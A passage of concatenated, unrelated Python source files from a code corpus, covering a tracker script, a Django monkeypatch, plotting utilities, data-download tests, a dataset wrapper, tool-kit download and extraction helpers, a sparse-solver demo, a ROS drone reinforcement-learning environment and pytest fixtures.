parse.add_argument('--lr', type=float, default=0.125, help='the learning rate')
parse.add_argument('--sigma', type=float, default=100, help='the sigma')
parse.add_argument('--num_pretrain', type=int, default=128, help='the number of pretrain')
parse.add_argument('--rotate', action='store_true', help='if rotate image during pre-training.')
parse.add_argument('--record', action='store_true', help='record the frames')

if __name__ == '__main__':
    args = parse.parse_args()
    # Hard-coded demo sequence; presumably a directory of frames -- TODO confirm.
    img_path = 'datasets/surfer/'
    tracker = mosse(args, img_path)
    tracker.start_tracking()
| StarcoderdataPython |
6540116 | <gh_stars>10-100
"""
Monkeypatches ``Project`` model to keep the size to 255 characters up from 63 since RTD 2.8.1.
RTD changed the name / slug length to 63 chars to fit DNS restrictions as they use the project
slug as third level domain (don't ask me why the restricted the name to the same length).
As we only use in a normal path we don't have such restrictions and we have a lot of long names,
we must revert this change.
Plus they changed a field type and we have to make sure our data fits correctly in the new type
* migration projects.0030_change-max-length-project-slug is modified in a noop (code is
commented to clarify the original scope of the migration).
* monkeypatch `Project` to set field length and validator to our length to let things work at
runtime (forms validation etc). monkeypatch has been preferred over changing existing code
to reduce the chances of conflicts.
"""
from django.core import validators
from readthedocs.projects.models import Project
def monkey_patch_project_model():
    """
    Revert changes in 8d2ee29de95690a9cd72d4f2a0b4131a44449928.

    RTD shrank ``name``/``slug`` to 63 chars to satisfy DNS label limits, but
    we only use the slug in URL paths, so restore the original 255-char limit
    on both the field and its MaxLengthValidator.
    """
    desired_length = 255
    for field_name in ("name", "slug"):
        field_obj = Project._meta.get_field(field_name)
        field_obj.max_length = desired_length
        # Forms validate through the field's validators, so the attached
        # MaxLengthValidator must be widened as well.
        for field_validator in field_obj.validators:
            if isinstance(field_validator, validators.MaxLengthValidator):
                field_validator.limit_value = desired_length


monkey_patch_project_model()
| StarcoderdataPython |
3454348 | from .grad_cam import GradCAM, GradCAMPlusPlus, XGradCAM
from .utils import overlay
| StarcoderdataPython |
1950883 | <filename>plums/plot/engine/utils.py
import PIL.ImageFont
import numpy as np
from plums.commons import Path
def get_text_color(background_color):
    """Pick a readable text color (white or black) for a given background.

    Arguments:
        background_color (tuple): The record color (RGB or RGBA format).

    Returns:
        tuple: White ``(255, 255, 255)`` on dark backgrounds, black
        ``(0, 0, 0)`` on light ones.
    """
    red, green, blue = background_color[0], background_color[1], background_color[2]
    # Perceived luminance: the human eye weighs green most heavily.
    luminance = (0.299 * red + 0.587 * green + 0.114 * blue) / 255.
    dark_background = luminance <= 0.5
    return (255, 255, 255) if dark_background else (0, 0, 0)
def get_outline_color(background_color):
    """Select an appropriate outline gray level based on the background luminance.

    Fixed docstring: unlike :func:`get_text_color` (from which this was
    copy-pasted), this returns a light or dark *gray outline* color, not
    black/white text.

    Arguments:
        background_color (tuple): The record color (RGB or RGBA format).

    Returns:
        tuple: A light gray ``(150, 150, 150)`` on dark backgrounds, a darker
        gray ``(100, 100, 100)`` on light backgrounds.
    """
    # Counting the perceptive luminance - human eye favors green color...
    luminance = (0.299 * background_color[0] + 0.587 * background_color[1] + 0.114 * background_color[2]) / 255.

    # Light outline on "dark" backgrounds, darker outline on "light" backgrounds
    if luminance <= 0.5:
        return 150, 150, 150
    return 100, 100, 100
def get_default_font(text_size):
    """Get a default font to render targets with text.

    Args:
        text_size (int): text size in pixels

    Returns:
        :class:`~PIL.ImageFont.FreeTypeFont`
    """
    # NOTE(review): ``assert`` is stripped under ``python -O``; an explicit
    # raise would be safer, but callers may rely on AssertionError -- confirm
    # before changing.
    assert isinstance(text_size, int) and text_size > 0, "Text size should be positive integer"
    # The font ships next to this module; Path(__file__)[:-1] is plums' Path
    # slicing for "parent directory".
    return PIL.ImageFont.truetype(font=str(Path(__file__)[:-1] / "fonts" / "arial.ttf"), size=text_size)
def dict_equal(dictionary, other_dictionary):
    """Compare two dict with :class:`numpy.ndarray` value handling.

    The comparison first checks that both dict expose the same key set, then
    compares each value pair, returning ``False`` as soon as one pair differs.

    Note:
        Value comparison implicitly delegates to the :meth:`__eq__` method of
        singular elements and avoids explicit type-checks; :class:`numpy.ndarray`
        values are folded with :func:`numpy.all` so element-wise results collapse
        to a single boolean.

    Args:
        dictionary (dict): A :class:`dict` to compare with another.
        other_dictionary (dict): A :class:`dict` to compare with another.

    Returns:
        bool: :any:`True` if the two dict are equal in keys and content.
    """
    # Different key sets: nothing further to compare.
    if set(dictionary.keys()) != set(other_dictionary.keys()):
        return False

    for key, value in dictionary.items():
        other_value = other_dictionary[key]
        array_involved = isinstance(value, np.ndarray) or isinstance(other_value, np.ndarray)
        if array_involved:
            # Collapse the element-wise comparison through np.all().
            if not np.all(value == other_value):
                return False
        elif not value == other_value:
            return False

    return True
| StarcoderdataPython |
3204220 |
def test_povgen():
    """Regression-test the povgen.py script against archived POV-Ray output.

    Downloads a sample HDF5 solution, runs povgen on it, then diffs the three
    generated .pov frames against an archived tarball of known-good frames.

    NOTE(review): ``urllib.urlretrieve`` is Python-2-only API (py3 moved it to
    ``urllib.request``) -- this test presumably targets a py2 environment;
    confirm before porting. Requires network access and leaves the generated
    .pov files on disk (only the archives are cleaned up).
    """
    import difflib
    import urllib
    import subprocess
    import os
    # Repo root is four directories up from this test module.
    proteus_path = os.path.dirname(
        os.path.dirname(
            os.path.dirname(
                os.path.dirname(os.path.abspath(__file__)))))
    povgen_path = os.path.join(proteus_path,'scripts','povgen.py')
    # Fetch the sample solution file and render 3 frames from it.
    urllib.urlretrieve(
        'https://dl.dropboxusercontent.com/u/26353144/floating_bar0.h5',
        'floating_bar0.h5')
    subprocess.check_call([povgen_path,
                           'floating_bar',
                           '-s',
                           '3'])
    # prefix='phi_0.000000_
    povfiles = []
    for i in range(3):
        filename = 'phi_0.000000_{0:04d}.pov'.format(i)
        with open(filename, 'r') as f:
            povfiles.append(f.readlines())
    # Fetch and unpack the archived reference frames, then compare line-by-line.
    urllib.urlretrieve(
        'https://dl.dropboxusercontent.com/u/26353144/phi_0.000000_000.tgz',
        'phi_0.000000_000.tgz')
    subprocess.check_call(['tar', 'xzf', 'phi_0.000000_000.tgz'])
    saved_povfiles = []
    for i in range(3):
        filename = 'phi_0.000000_{0:04d}.pov'.format(i)
        with open(filename, 'r') as f:
            saved_povfiles.append(f.readlines())
        # On mismatch, show a unified diff of archived vs freshly generated.
        assert saved_povfiles[i] == povfiles[i], \
            ''.join(list(difflib.unified_diff(saved_povfiles[i],
                                              povfiles[i],
                                              "archived",
                                              "test")))
    os.remove('phi_0.000000_000.tgz')
    os.remove('floating_bar0.h5')
| StarcoderdataPython |
8033216 | <reponame>MohammedAljahdali/shrinkbench<gh_stars>100-1000
import pathlib
from torch.utils.data import Dataset
from torchvision.datasets import ImageFolder
# Data is here : http://places2.csail.mit.edu/download.html
# We assume directory structure from
# Small images (256 * 256) with easy directory structure
class Places365(Dataset):
    """Places365-Standard dataset as a thin wrapper around torchvision's ImageFolder.

    Expects the "small images (256x256), easy directory structure" layout:
    ``<root>/places365_standard/{train,val}/<class>/<image>``.
    """

    def __init__(self, root, train=True, transform=None, target_transform=None, **kwargs):
        # root: dataset root containing the places365_standard/ directory.
        # train: selects the 'train' split when True, otherwise 'val'.
        # Extra kwargs are forwarded to ImageFolder.
        root = pathlib.Path(root)
        root /= 'places365_standard'
        root /= 'train' if train else 'val'
        self.data = ImageFolder(root,
                                transform=transform,
                                target_transform=target_transform,
                                **kwargs)

    def __len__(self):
        # Delegate length to the wrapped ImageFolder.
        return len(self.data)

    def __getitem__(self, index):
        # Returns whatever ImageFolder yields: an (image, class_index) pair.
        return self.data[index]
| StarcoderdataPython |
3427470 | """WizardKit: Tool Functions"""
# vim: sts=2 sw=2 ts=2
from datetime import datetime, timedelta
import logging
import pathlib
import platform
import requests
from wk.cfg.main import ARCHIVE_PASSWORD
from wk.cfg.sources import DOWNLOAD_FREQUENCY, SOURCES
from wk.exe import popen_program, run_program
from wk.std import GenericError
# STATIC VARIABLES
ARCH = '64' if platform.architecture()[0] == '64bit' else '32'  # bitness suffix used in tool names
LOG = logging.getLogger(__name__)

# "GLOBAL" VARIABLES
CACHED_DIRS = {}  # memoized find_kit_dir() results, keyed by name (None for the default '.bin' search)
# Functions
def download_file(out_path, source_url, as_new=False, overwrite=False):
  """Download a file using requests, returns pathlib.Path.

  Args:
    out_path: destination file path (created parents as needed).
    source_url: URL to fetch.
    as_new: if True, append '.new' to the destination suffix.
    overwrite: if False, refuse to replace an existing file.

  Raises:
    FileExistsError: destination exists and overwrite is False.
    GenericError: the request failed or returned a non-OK status.
  """
  out_path = pathlib.Path(out_path).resolve()
  name = out_path.name
  download_failed = None
  download_msg = f'Downloading {name}...'
  if as_new:
    out_path = out_path.with_suffix(f'{out_path.suffix}.new')
  print(download_msg, end='', flush=True)

  # Avoid clobbering
  if out_path.exists() and not overwrite:
    raise FileExistsError(f'Refusing to clobber {out_path}')

  # Create destination directory
  out_path.parent.mkdir(parents=True, exist_ok=True)

  # Request download (streamed so large files are not held in memory)
  try:
    response = requests.get(source_url, stream=True)
  except requests.RequestException as _err:
    download_failed = _err
  else:
    if not response.ok:
      download_failed = response

  # Download failed
  if download_failed:
    LOG.error('Failed to download file: %s', download_failed)
    raise GenericError(f'Failed to download file: {name}')

  # Write to file
  with open(out_path, 'wb') as _f:
    for chunk in response.iter_content(chunk_size=128):
      _f.write(chunk)

  # Done: erase the progress message via ANSI cursor-back + erase-line
  print(f'\033[{len(download_msg)}D\033[0K', end='', flush=True)
  return out_path
def download_tool(folder, name, suffix=None):
  """Download tool into the kit's .bin tree, skipping fresh copies.

  A copy newer than DOWNLOAD_FREQUENCY days is considered up to date.
  Prefers an arch-specific source URL (e.g. 'name64') when one exists.
  """
  name_arch = f'{name}{ARCH}'
  out_path = get_tool_path(folder, name, check=False, suffix=suffix)
  up_to_date = False

  # Check if tool is up to date
  try:
    ctime = datetime.fromtimestamp(out_path.stat().st_ctime)
    up_to_date = datetime.now() - ctime < timedelta(days=DOWNLOAD_FREQUENCY)
  except FileNotFoundError:
    # Ignore - we'll download it below
    pass
  if out_path.exists() and up_to_date:
    LOG.info('Skip downloading up-to-date tool: %s', name)
    return

  # Get ARCH specific URL if available
  if name_arch in SOURCES:
    source_url = SOURCES[name_arch]
    out_path = out_path.with_name(f'{name_arch}{out_path.suffix}')
  else:
    source_url = SOURCES[name]

  # Download to a temp '.new' file, then atomically replace the old copy
  LOG.info('Downloading tool: %s', name)
  try:
    new_file = download_file(out_path, source_url, as_new=True)
    new_file.replace(out_path)
  except GenericError:
    # Ignore as long as there's still a version present
    if not out_path.exists():
      raise
def extract_archive(archive, out_path, *args, mode='x', silent=True):
  """Extract an archive to out_path using the kit's 7-Zip.

  Args:
    archive: archive file to extract.
    out_path: destination directory (parents created as needed).
    *args: extra 7z command-line switches.
    mode: 7z command letter ('x' extracts with full paths).
    silent: suppress 7z output/progress streams when True.
  """
  out_path = pathlib.Path(out_path).resolve()
  out_path.parent.mkdir(parents=True, exist_ok=True)
  cmd = [get_tool_path('7-Zip', '7z'), mode, archive, f'-o{out_path}', *args]
  if silent:
    cmd.extend(['-bso0', '-bse0', '-bsp0'])

  # Extract
  run_program(cmd)
def extract_tool(folder):
  """Extract tool <folder>.7z from the kit's .cbin into the .bin tree.

  Uses the shared ARCHIVE_PASSWORD; existing files are kept (-aos).
  """
  extract_archive(
    find_kit_dir('.cbin').joinpath(folder).with_suffix('.7z'),
    find_kit_dir('.bin').joinpath(folder),
    '-aos', f'-p{ARCHIVE_PASSWORD}',
    )
def find_kit_dir(name=None):
  """Find folder in kit, returns pathlib.Path.

  Search is performed in the script's path and then recursively upwards.
  If name is given then search for that instead.

  Raises:
    FileNotFoundError: the search reached the filesystem root without a hit.
  """
  cur_path = pathlib.Path(__file__).resolve().parent
  search = name if name else '.bin'

  # Search (cache hit short-circuits the walk; None keys the default search)
  if name in CACHED_DIRS:
    return CACHED_DIRS[name]
  while not cur_path.match(cur_path.anchor):
    if cur_path.joinpath(search).exists():
      break
    cur_path = cur_path.parent

  # Check: landing on the anchor means the walk exhausted without finding it
  if cur_path.match(cur_path.anchor):
    raise FileNotFoundError(f'Failed to find kit dir, {name=}')
  if name:
    cur_path = cur_path.joinpath(name)

  # Done
  CACHED_DIRS[name] = cur_path
  return cur_path
def get_tool_path(folder, name, check=True, suffix=None):
  """Get tool path, returns pathlib.Path.

  Prefers the arch-specific binary (e.g. 'name64.exe'); falls back to the
  plain name unless an arch-specific download source exists. With check=True
  a missing file raises FileNotFoundError.
  """
  bin_dir = find_kit_dir('.bin')
  if not suffix:
    suffix = 'exe'
  name_arch = f'{name}{ARCH}'

  # "Search"
  tool_path = bin_dir.joinpath(f'{folder}/{name_arch}.{suffix}')
  if not (tool_path.exists() or name_arch in SOURCES):
    # Use "default" path instead
    tool_path = tool_path.with_name(f'{name}.{suffix}')

  # Missing?
  if check and not tool_path.exists():
    raise FileNotFoundError(f'Failed to find tool, {folder=}, {name=}')

  # Done
  return tool_path
def run_tool(
    folder, name, *run_args,
    cbin=False, cwd=False, download=False, popen=False,
    **run_kwargs,
    ):
  """Run tool from the kit or the Internet, returns proc obj.

  proc will be either subprocess.CompletedProcess or subprocess.Popen.

  Args:
    folder: tool subdirectory under the kit's .bin tree.
    name: tool base name (arch suffix resolved by get_tool_path).
    *run_args: arguments appended to the tool command line.
    cbin: extract the tool from the encrypted .cbin archive first.
    cwd: run with the tool's own directory as working directory.
    download: (re)download the tool before running.
    popen: launch without waiting (Popen) instead of run_program.
  """
  proc = None

  # Extract from .cbin
  if cbin:
    extract_tool(folder)

  # Download tool
  if download:
    download_tool(folder, name)

  # Run
  tool_path = get_tool_path(folder, name)
  cmd = [tool_path, *run_args]
  if cwd:
    run_kwargs['cwd'] = tool_path.parent
  if popen:
    proc = popen_program(cmd, **run_kwargs)
  else:
    # check=False: callers inspect the returned proc instead of catching
    proc = run_program(cmd, check=False, **run_kwargs)

  # Done
  return proc
# This module is import-only; guard against accidental direct execution.
if __name__ == '__main__':
  print("This file is not meant to be called directly.")
| StarcoderdataPython |
1801221 | import re
import json
from typing import Tuple
MISSING_EMPTY_STR = re.compile(r'''
\s*
(
null
| false
| \-? 0 (\.0+)? ([eE] [\-\+]? [0-9]+)?
| \{ \s* \}
| \[ \s* \]
)
\s*
''', re.VERBOSE)
def test_regex_is_falsey(s: str) -> Tuple[bool, bool]:
"""
post: _[0] != _[1]
raises: json.JSONDecodeError
"""
return (
bool(json.loads(s)),
bool(MISSING_EMPTY_STR.fullmatch(s)),
)
| StarcoderdataPython |
11260743 | <gh_stars>1-10
# run functions for merge
import os
import pytest
from merge_data import load_data, merge_data
from arrest_analysis import model_arrest, load_alldata, select_variables, save_output
@pytest.fixture
def alldata():
    """Fixture: demographic and task data from ./data merged into one frame."""
    datadir = 'data'
    demogdata, taskdata = load_data(datadir)
    alldata = merge_data(demogdata, taskdata, datadir)
    return alldata
def test_analysis(alldata):
    """Smoke-test the arrest analysis: both models fit and output is saved."""
    resultsdir = 'results'
    if not os.path.exists(resultsdir):
        os.mkdir(resultsdir)
    arrestdata = select_variables(alldata)
    log_reg, log_reg_baseline = model_arrest(arrestdata)
    # Both the full and the baseline logistic regressions must be produced.
    assert log_reg is not None
    assert log_reg_baseline is not None
    save_output(log_reg, log_reg_baseline, resultsdir)
| StarcoderdataPython |
9729019 | <gh_stars>10-100
import sys
sys.path.append('rchol/')
import numpy as np
from scipy.sparse import identity
from numpy.linalg import norm
from rchol import *
from util import *

# Demo: build an rchol preconditioner for a 3D Poisson problem and solve with
# preconditioned CG, then reuse the permutation/partition on a perturbed matrix.

# Initial problem: 3D-Poisson
n = 20
A = laplace_3d(n) # see ./rchol/util.py

# random RHS
N = A.shape[0]
b = np.random.rand(N)
print("Initial problem:")

# compute preconditioner after reordering (multi thread)
nthreads = 2
G, perm, part = rchol(A, nthreads)
Aperm = A[perm[:, None], perm]
print('fill-in ratio: {:.2}'.format(2*G.nnz/A.nnz))

# solve with PCG (G and its transpose act as the split preconditioner)
tol = 1e-6
maxit = 200
x, relres, itr = pcg(Aperm, b[perm], tol, maxit, G, G.transpose().tocsr())
print('# CG iterations: {}'.format(itr))
print('Relative residual: {:.2e}\n'.format(relres))

# perturb the original matrix (same sparsity pattern, shifted diagonal)
B = A + 1e-3*identity(N)
print('New problem (same sparsity) ...')

# compute preconditioner with existing permutation/partition
L = rchol(B, nthreads, perm, part)[0]
print('fill-in ratio: {:.2}'.format(2*L.nnz/A.nnz))

# solve the new problem
Bperm = B[perm[:, None], perm]
x, relres, itr = pcg(Bperm, b[perm], tol, maxit, L, L.transpose().tocsr())
print('# CG iterations: {}'.format(itr))
print('Relative residual: {:.2e}\n'.format(relres))
| StarcoderdataPython |
1940300 | #!/usr/bin/ python
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 2 18:33:10 2016
Modified from https://stackoverflow.com/questions/38076682/how-to-add-colors-to-each-individual-face-of-a-cylinder-using-matplotlib
to add "end caps" and to undo fancy coloring.
@author: astrokeat
"""
import numpy as np
from matplotlib import pyplot as plt
from matplotlib import cm
from scipy.linalg import norm
from mpl_toolkits.mplot3d import Axes3D
import pandas as pd
import sys
# NOTE(review): Python 2 script (bare ``print`` statements). Renders root
# segments (from GroIMP seg*.txt exports) as colored cylinders, one 3D figure
# per simulated day. Nesting below reconstructed from control flow -- confirm
# against the original file.
day_list = []
day = 1
count = 0
X = []
Y = []
Z = []
# Initial read of the day-60 segment table (columns reused per-day below).
df1 = pd.read_csv('/home/renato/groimp_efficient/run_1/seg60.txt',
                  delim_whitespace=True,skiprows=0,header=0)
NumAxe = np.array(df1['NumAxe'].values)
Jour = np.array(df1['Jour'].values)
Diam = np.array(df1['Diam'].values)
x1 = np.array(df1['X1'].values)
y1 = np.array(df1['Y1'].values)
z1 = np.array(df1['Z1'].values)
x2 = np.array(df1['X2'].values)
y2 = np.array(df1['Y2'].values)
z2 = np.array(df1['Z2'].values)
while day <= 30:
    print day_list
    ax = plt.subplot(111, projection='3d')
    day_list.append(day)
    #for j in range(len(NumAxe)):
    #print NumAxe[i],Jour[i],Diam[i],X1[i], Y1[i], Z1[i],X2[i], Y2[i], Z2[i]
    # Re-read the segment table for the current day.
    df1 = pd.read_csv('/home/renato/groimp_efficient/plot/run1_root_data/seg%s.txt'%(day),
                      delim_whitespace=True,skiprows=0,header=0)
    #if Jour[j] in day_list:
    NumAxe = np.array(df1['NumAxe'].values)
    Jour = np.array(df1['Jour'].values)
    Diam = np.array(df1['Diam'].values)
    x1 = np.array(df1['X1'].values)
    y1 = np.array(df1['Y1'].values)
    z1 = np.array(df1['Z1'].values)
    x2 = np.array(df1['X2'].values)
    y2 = np.array(df1['Y2'].values)
    z2 = np.array(df1['Z2'].values)
    # Build one cylinder surface per root segment (z negated: depth below soil).
    for j in range(len(x1)):
        #axis and radius
        p0 = np.array([x1[j], y1[j], -z1[j]]) #point at one end
        p1 = np.array([x2[j], y2[j], -z2[j]]) #point at other end
        R = Diam[j]
        #vector in direction of axis
        v = p1 - p0
        #find magnitude of vector
        mag = norm(v)
        #unit vector in direction of axis
        v = v / mag
        #make some vector not in the same direction as v
        not_v = np.array([1, 0, 0])
        if (v == not_v).all():
            not_v = np.array([0, 1, 0])
        #make vector perpendicular to v
        n1 = np.cross(v, not_v)
        #normalize n1
        n1 /= norm(n1)
        #make unit vector perpendicular to v and n1
        n2 = np.cross(v, n1)
        #surface ranges over t from 0 to length of axis and 0 to 2*pi
        t = np.linspace(0, mag, 2)
        theta = np.linspace(0, 2 * np.pi, 100)
        rsample = np.linspace(0, R, 2)
        #use meshgrid to make 2d arrays
        t, theta2 = np.meshgrid(t, theta)
        rsample,theta = np.meshgrid(rsample, theta)
        #generate coordinates for surface
        # "Tube"
        #X, Y, Z = [p0[i] + v[i] * t + R * np.sin(theta2) * n1[i] + R * np.cos(theta2) * n2[i] for i in [0, 1, 2]]
        # NOTE(review): X/Y/Z accumulate across days while j restarts at 0 each
        # day, so X[j] below may index a surface from an earlier day -- confirm.
        X.append(p0[0] + v[0] * t + R * np.sin(theta2) * n1[0] + R * np.cos(theta2) * n2[0])
        Y.append(p0[1] + v[1] * t + R * np.sin(theta2) * n1[1] + R * np.cos(theta2) * n2[1])
        Z.append(p0[2] + v[2] * t + R * np.sin(theta2) * n1[2] + R * np.cos(theta2) * n2[2])
        #T = (X[j]**2+Y[j]**2+Z[j]**2)**(1/2)
        # Color by normalized depth using the reversed jet colormap.
        my_col = cm.jet_r(Z[j]/float(Z[j].max()))
        ax.plot_surface(X[j], Y[j], Z[j], facecolors = my_col)
        #ax.plot_surface(X_diff, X_diff, X_diff, facecolors = my_col)
        #ax.plot_surface(X, Y, Z, color = cm.rainbow(255*Jour[i]/60))
        #ax.contourf(X, Y, Z, zdir='y', offset=max(y2),cmap=cm.rainbow, vmin=0, vmax=60)
    # Tweaking display region and labels
    ax.set_xlim(-250, 250)
    ax.set_ylim(-250, 250)
    ax.set_zlim(-1000, 0)
    ax.set_xlabel('X axis')
    ax.set_ylabel('Y axis')
    ax.set_zlabel('Z axis')
    #ax.plot_surface(X2, Y2, Z2, color='black')
    #ax.plot_surface(X3, Y3, Z3, color='black')
    count = count + 1
    # Colorbar spanning the 0-60 day range.
    m = cm.ScalarMappable(cmap=cm.jet)
    m.set_array(range(61))
    cbar = plt.colorbar(m)
    cbar.ax.set_ylabel('Root age (days)', rotation=270, labelpad=20)
    #plt.colorbar(m)
    plt.title('DAY = %i' %(day))
    plt.tight_layout()
    plt.show()
    #plt.savefig('/home/renato/groimp_efficient/run_2/figures/root_3d_%i.png'%(day))
    #ax=plt.subplot(111, projection='3d')
    day = day + 1
| StarcoderdataPython |
5028792 | #!/usr/bin/env python
import rospy
import numpy as np
import math
from math import pi
from geometry_msgs.msg import Twist, Point, Pose
from sensor_msgs.msg import LaserScan
from sensor_msgs.msg import Range
from std_msgs.msg import *
from nav_msgs.msg import Odometry
from std_srvs.srv import Empty
from tf.transformations import euler_from_quaternion, quaternion_from_euler
from datetime import datetime
# pathfollowing
# world = False
# if world:
# from respawnGoal_custom_worlds import Respawn
# else:
# from respawnGoal_3D import Respawn
# import copy
# target_not_movable = False
# Navigation configuration: custom-world goal respawner, target stays fixed
# once reached (the commented-out block above is the path-following variant).
world = True
from respawnGoal_3D import Respawn
import copy
target_not_movable = True
class Env():
    """Gazebo/ROS RL environment for the hydrone aerial/underwater vehicle.

    Publishes velocity commands, tracks odometry, computes heading/distance to
    a respawnable goal, and exposes a step/reset interface for an RL agent.
    """

    def __init__(self, action_dim=3):
        # Goal pose and derived headings (updated by getOdometry callback).
        self.goal_x = 0
        self.goal_y = 0
        self.goal_z = 0
        self.heading = 0
        self.heading_z = 0
        self.initGoal = True
        self.get_goalbox = False
        self.position = Pose()
        # ROS plumbing: command publisher, odometry subscriber, Gazebo services.
        self.pub_cmd_vel = rospy.Publisher('/hydrone_aerial_underwater/cmd_vel', Twist, queue_size=5)
        self.sub_odom = rospy.Subscriber('/hydrone_aerial_underwater/ground_truth/odometry', Odometry, self.getOdometry)
        self.reset_proxy = rospy.ServiceProxy('gazebo/reset_world', Empty)
        self.pub_pose = rospy.Publisher("/hydrone_aerial_underwater/ground_truth/pose", Pose, queue_size=5)
        self.pub_end = rospy.Publisher("/hydrone_aerial_underwater/end_testing", Bool, queue_size=5)
        self.pub_reward = rospy.Publisher("/hydrone_aerial_underwater/rewarded", Bool, queue_size=5)
        # Evaluation bookkeeping (episode budget comes from ROS params).
        self.eps_to_test = rospy.get_param('~num_eps_test')
        self.counter_eps = 0
        self.unpause_proxy = rospy.ServiceProxy('gazebo/unpause_physics', Empty)
        self.pause_proxy = rospy.ServiceProxy('gazebo/pause_physics', Empty)
        self.respawn_goal = Respawn()
        self.past_distance = 0.
        self.arriving_distance = rospy.get_param('~arriving_distance')
        self.evaluating = rospy.get_param('~test_param')
        self.stopped = 0
        self.action_dim = action_dim
        self.last_time = datetime.now()
        #Keys CTRL + c will stop script
        rospy.on_shutdown(self.shutdown)

    def shutdown(self):
        #you can stop turtlebot by publishing an empty Twist
        #message
        rospy.loginfo("Stopping Simulation")
        self.pub_cmd_vel.publish(Twist())
        rospy.sleep(1)

    def getGoalDistace(self):
        """Return (and remember) the 3D Euclidean distance to the goal."""
        goal_distance = math.sqrt((self.goal_x - self.position.x)**2 + (self.goal_y - self.position.y)**2 + (self.goal_z - self.position.z)**2)
        self.past_distance = goal_distance

        return goal_distance

    def getOdometry(self, odom):
        """Odometry callback: update position, yaw-relative heading and pitch-like heading_z."""
        self.past_position = copy.deepcopy(self.position)
        self.position = odom.pose.pose.position
        orientation = odom.pose.pose.orientation
        orientation_list = [orientation.x, orientation.y, orientation.z, orientation.w]
        _, _, yaw = euler_from_quaternion(orientation_list)

        goal_angle = math.atan2(self.goal_y - self.position.y, self.goal_x - self.position.x)
        # Vertical angle toward the goal relative to the horizontal plane.
        self.heading_z = math.atan2(self.goal_z - self.position.z, math.sqrt((self.goal_x - self.position.x)**2 + (self.goal_y - self.position.y)**2))
        # rospy.loginfo("%s", goal_angle_z)

        heading = goal_angle - yaw
        #print 'heading', heading
        # Wrap to [-pi, pi].
        if heading > pi:
            heading -= 2 * pi
        elif heading < -pi:
            heading += 2 * pi

        self.heading = round(heading, 3)

    def getState(self, scan, past_action):
        """Build the observation vector from the laser scan and past action.

        Returns (state, done) where state = clipped scan ranges + past action
        + [heading, heading_z, distance-to-goal]. done flags a collision
        (range < 0.6) or leaving the allowed altitude band [0.2, 4.8].
        """
        scan_range = []
        min_range = 0.6
        done = False

        for i in range(len(scan.ranges)):
            if scan.ranges[i] == float('Inf'):
                scan_range.append(20.0)  # cap "no return" at 20 m
            elif np.isnan(scan.ranges[i]):
                scan_range.append(0)
            else:
                scan_range.append(scan.ranges[i])

        if min_range > min(scan_range) or self.position.z < 0.2 or self.position.z > 4.8:
            # print(scan_range)
            done = True

        for pa in past_action:
            scan_range.append(pa)

        current_distance = math.sqrt((self.goal_x - self.position.x)**2 + (self.goal_y - self.position.y)**2 + (self.goal_z - self.position.z)**2)
        # current_distance = math.sqrt((self.goal_x - self.position.x)**2 + (self.goal_y - self.position.y)**2)
        if current_distance < self.arriving_distance:
            self.get_goalbox = True

        return scan_range + [self.heading, self.heading_z, current_distance], done

    def setReward(self, state, done):
        """Sparse reward: -10 on collision, +100 on reaching the goal, else 0.

        Reaching the goal also stops the robot, optionally resets the world,
        respawns the goal and announces the reward on /rewarded.
        """
        reward = 0

        if done:
            rospy.loginfo("Collision!!")
            # reward = -550.
            reward = -10.
            self.pub_cmd_vel.publish(Twist())

        if self.get_goalbox:
            rospy.loginfo("Goal!! "+str(abs(self.goal_z - self.position.z)))
            # reward = 500.
            reward = 100#/(abs(self.goal_z - self.position.z)+0.01)
            self.pub_cmd_vel.publish(Twist())
            if world and target_not_movable:
                self.reset()
            self.goal_x, self.goal_y, self.goal_z = self.respawn_goal.getPosition(True, delete=True)
            self.goal_distance = self.getGoalDistace()
            self.get_goalbox = False

        if (reward == 100):
            self.pub_reward.publish(True)
        # else:
        #     self.pub_reward.publish(False)

        return reward, done

    def step(self, action, past_action):
        """Apply [vx, vz, wz] for one step; return (state, reward, done)."""
        linear_vel_x = action[0]
        linear_vel_z = action[1]
        angular_vel_z = action[2]
        # angular_vel_z = action[2]

        vel_cmd = Twist()
        vel_cmd.linear.x = linear_vel_x
        vel_cmd.linear.z = linear_vel_z
        vel_cmd.angular.z = angular_vel_z
        self.pub_cmd_vel.publish(vel_cmd)

        # Block until a fresh laser scan arrives.
        data = None
        while data is None:
            try:
                data = rospy.wait_for_message('/hydrone_aerial_underwater/scan', LaserScan, timeout=5)
            except:
                pass

        state, done = self.getState(data, past_action)
        reward, done = self.setReward(state, done)

        return np.asarray(state), reward, done

    def reset(self):
        """Reset the simulation and return the initial observation."""
        #print('aqui2_____________---')
        rospy.wait_for_service('gazebo/reset_simulation')
        try:
            self.reset_proxy()
        except (rospy.ServiceException) as e:
            print("gazebo/reset_simulation service call failed")

        # Wait for the first scan after the reset.
        data = None
        while data is None:
            try:
                data = rospy.wait_for_message('/hydrone_aerial_underwater/scan', LaserScan, timeout=5)
            except:
                pass

        if self.initGoal:
            self.goal_x, self.goal_y, self.goal_z = self.respawn_goal.getPosition()
            self.initGoal = False
        else:
            self.goal_x, self.goal_y, self.goal_z = self.respawn_goal.getPosition(True, delete=True)

        # publish the episode time (smuggled through Twist.linear.y)
        timer = Twist()
        timer.linear.y = (datetime.now() - self.last_time).total_seconds()
        self.pub_cmd_vel.publish(timer)
        self.last_time = datetime.now()

        # End-of-evaluation: after the configured episode budget, stop the node.
        self.counter_eps += 1
        if((self.counter_eps == self.eps_to_test) and self.evaluating == True):
            self.pub_end.publish(False)
            rospy.signal_shutdown("end_test")

        # pose_reset = Pose()
        # pose_reset.position.x = -100.0
        # self.pub_pose.publish(pose_reset)

        self.goal_distance = self.getGoalDistace()
        # state, _ = self.getState(data, [0.,0., 0.0])
        state, _ = self.getState(data, [0]*self.action_dim)

        return np.asarray(state)
9705749 | <gh_stars>1-10
import pytest
from pathlib import Path
@pytest.fixture(scope="function")
def parser_check():
    """Korean words paired with example sentences, keyed for parser tests."""
    samples = {
        "프룬_word": "프룬",
        "프룬_sentence": "프룬이 먹고 싶어",
        "의창지_word": "의창지",
        "의창지_sentence": "의창지를 먹고 싶어",
        "금요일_word": "금요일에 만나요",
        "금요일_sentence": "아이유의 금요일에 만나요를 들으면서 라즈베리를 먹을래",
    }
    return samples
@pytest.fixture(scope="function")
def mock_mecab_parser_sentence():
    """Single Korean sentence used to exercise the MeCab parser."""
    return {"병원_sentence": "나는 서울대병원에 갔어"}
@pytest.fixture(scope="function")
def mecab_ner_dir():
    """Path to the bundled python_mecab_ner NER data directory."""
